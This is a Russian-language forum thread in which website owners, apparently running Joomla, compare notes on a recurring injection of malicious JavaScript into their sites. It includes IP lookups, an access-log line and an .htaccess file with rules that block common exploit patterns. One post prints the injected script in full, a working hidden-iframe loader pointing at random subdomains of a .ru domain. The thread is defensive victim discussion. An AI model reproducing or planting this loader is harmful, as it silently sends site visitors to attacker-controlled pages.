сглазил( и у меня тоже с этого
IP Information for 188.123.253.138
IP Location: Russian Federation Russian Federation Nemchinovka Akado-stolitsa Jsc
ASN: Russian Federation AS15582 AKADO-STOLITSA-AS "AKADO-Stolitsa" JSC (registered Aug 10, 2000)
IP Address: 188.123.253.138 Whois Reverse-Ip Ping DNS Lookup Traceroute
Whois Server whois.ripe.net
я же в сию секунду поправил месяц, а вы уже ответили :) ну и скорость.
С 3 сентября всё чисто... Мониторинг молчит. Еще заблокировал доступ к сайту через прокси сервера.
Подтверждаю, сегодня в 16:31 были изменены права на файл с 444 на 755,
с IP адреса: 65.19.138.34
;
var ifVcVajd = document.createElement('iframe');ifVcVajd.name = 'ifVcVajd';ifVcVajd.src = 'http://'+genstrdom(Math.floor(Math.random() * 20) + 5)+'.'+'bazeratincomers.ru/';ifVcVajd.style.width = '0px';ifVcVajd.style.height = '0px';window.onload = function() {document.cookie = 'chcook=yes; path=/; expires=Wednesday, 18-May-33 03:33:20 GMT'; if ((document.cookie.indexOf('ifVcVajd=') == -1) && (document.cookie.indexOf('chcook=') != -1)) { document.getElementsByTagName('body')[0].appendChild(ifVcVajd);var expiresDate = new Date(); expiresDate.setTime(expiresDate.getTime() + 432000000); setTimeout(function() { document.cookie = 'ifVcVajd=yes; path=/; expires=' + expiresDate; }, 5000);}};function genstrdom(length) {var st = '';var chars = 'abcdefghijklmnopqrstuvwxyz0123456789';for (i=1;i<length;i++) {var c = Math.floor(Math.random()*chars.length + 1);st += chars.charAt(c)}return st;}
т.е. права теперь не спасают...
лог:
65.19.138.34 - - [03/Sep/2013:15:31:41 +0300] "GET /index.php?format=feed&type=rss HTTP/1.1" 200 4742 "-" "Feedly/1.0 (+http://www.feedly.com/fetcher.html; like FeedFetcher-Google)"
Это IP яндекс бота, уже написал им в саппорт. Разбираются.
со страницы вк
Нет IP разный. Хостлайф .
Cегодня залили в тот же js, с 37.140.141.2
Друзья, когда первый раз обнаружили вредоносный код на сайте? У меня 6 августа. Напишите хотя бы приблизительно.
Спасибо kgtu5. Код удалил из файла, заменил стандартным файлом. Сменил все пароли. Написал вам в личку.
#Options +FollowSymLinks RewriteEngine On RewriteCond %{HTTP_HOST} yurevets37.ru$ [NC] RewriteCond %{HTTP_HOST} !^www.yurevets37.ru$ [NC] RewriteRule ^(.*)$ http://www.yurevets37.ru/$1 [R=301,L] RewriteCond %{REQUEST_URI} ^/sitemap.xml RewriteRule .* /index.php?option=com_xmap&view=xml&tmpl=component&id=2 [R=301,L] ## Mod_rewrite in use. ## Begin - Rewrite rules to block out some common exploits. # If you experience problems on your site block out the operations listed below # This attempts to block the most common type of exploit `attempts` to Joomla! # # Block out any script trying to base64_encode data within the URL. RewriteCond %{QUERY_STRING} base64_encode[^(]*\([^)]*\) [OR] # Block out any script that includes a <script> tag in URL. RewriteCond %{QUERY_STRING} (<|%3C)([^s]*s)+cript.*(>|%3E) [NC,OR] # Block out any script trying to set a PHP GLOBALS variable via URL. RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR] # Block out any script trying to modify a _REQUEST variable via URL. RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) # Return 403 Forbidden header and show the content of the root homepage RewriteRule .* index.php [F] # ## End - Rewrite rules to block out some common exploits. ## Begin - Custom redirects # # If you need to redirect some pages, or set a canonical non-www to # www redirect (or vice versa), place that code here. Ensure those # redirects use the correct RewriteRule syntax and the [R=301,L] flags. # ## End - Custom redirects ## # Uncomment following line if your webserver's URL # is not directly related to physical file paths. # Update Your Joomla! Directory (just / for root). ## # RewriteBase / ## Begin - Joomla! core SEF Section. # RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}] # # If the requested path and file is not /index.php and the request # has not already been internally rewritten to the index.php script RewriteCond %{REQUEST_URI} !^/index\.php # and the request is for something within the component folder, # or for the site root, or for an extensionless URL, or the # requested URL ends with one of the listed extensions RewriteCond %{REQUEST_URI} /component/|(/[^.]*|\.(php|html?|feed|pdf|vcf|raw))$ [NC] # and the requested path and file doesn't directly match a physical file RewriteCond %{REQUEST_FILENAME} !-f # and the requested path and file doesn't directly match a physical folder RewriteCond %{REQUEST_FILENAME} !-d # internally rewrite the request to the index.php script RewriteRule .* index.php [L] # ## End - Joomla! core SEF Section.
